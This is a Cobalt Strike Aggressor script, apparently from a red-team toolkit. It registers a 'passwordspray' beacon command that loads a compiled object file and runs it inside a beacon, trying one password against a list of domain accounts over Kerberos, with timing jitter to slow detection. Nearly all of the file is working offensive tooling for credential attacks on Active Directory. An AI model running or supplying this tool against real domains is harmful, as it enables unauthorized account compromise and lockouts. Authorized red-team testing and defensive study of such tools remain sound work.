OperatorsKit/KIT/PasswordSpray/passwordspray.cna

# author REDMED-X

beacon_command_register(
	"passwordspray", "Validate single password against multiple accounts using kerberos authentication.",
	"INFO:\nValidate single password against multiple accounts using kerberos authentication.\n\n" .
	"ARGUMENTS:\n[path to username file]: the path on your own attacker system to a file containing the list with usernames. Each username must be newline separated.\n[password]: the password to validate.\n[domain]: FQDN of the domain.\n[sleeptimer]: (optional) sleep timer in seconds to wait between each authentication attempt (default is 0).\n[jitter]: (optional) jitter in percentage (default 0).\n\n" .
	"USAGE:\npasswordspray <path to username file> <password> <domain> [opt <sleeptimer>] [opt <jitter>]\n\n" .
	"EXAMPLES:\npasswordspray C:\\Users\\redmed\\Documents\\usernames.txt Welcome01 example.local 10 40\npasswordspray C:\\Users\\redmed\\Documents\\usernames.txt Welcome01 example.local\n\n");
	
alias passwordspray {
    $bid = $1;
	$path = $2;
	$password = $3;
	$domain = $4;
	$timer = $5;
	$jitter = $6;
	
	if ($path eq "") {
		berror($bid, "Please specify the path on your own attacker system to the file containing the list with newline separated usernames.\n");
		return;
	}
	
	if ($password eq "" || $domain eq "") {
        berror($bid, "Please specify both password and domain name (FQDN).");
        return;
    }
	

	# read in the .txt file
	$handle = openf("$path");
	$file = readb($handle, -1);
	closef($handle);
	
	blog($bid, "path: $+  $path");
	
    # Read in the right BOF file
    $handle = openf(script_resource("passwordspray.o"));
    $data = readb($handle, -1);
    closef($handle);

	# Pack our arguments
    $arg_data = bof_pack($bid, "bZZii", $file, $password, $domain, $timer, $jitter);

	blog($bid, "Tasked to start password spraying..");
    beacon_inline_execute($bid, $data, "go", $arg_data);
}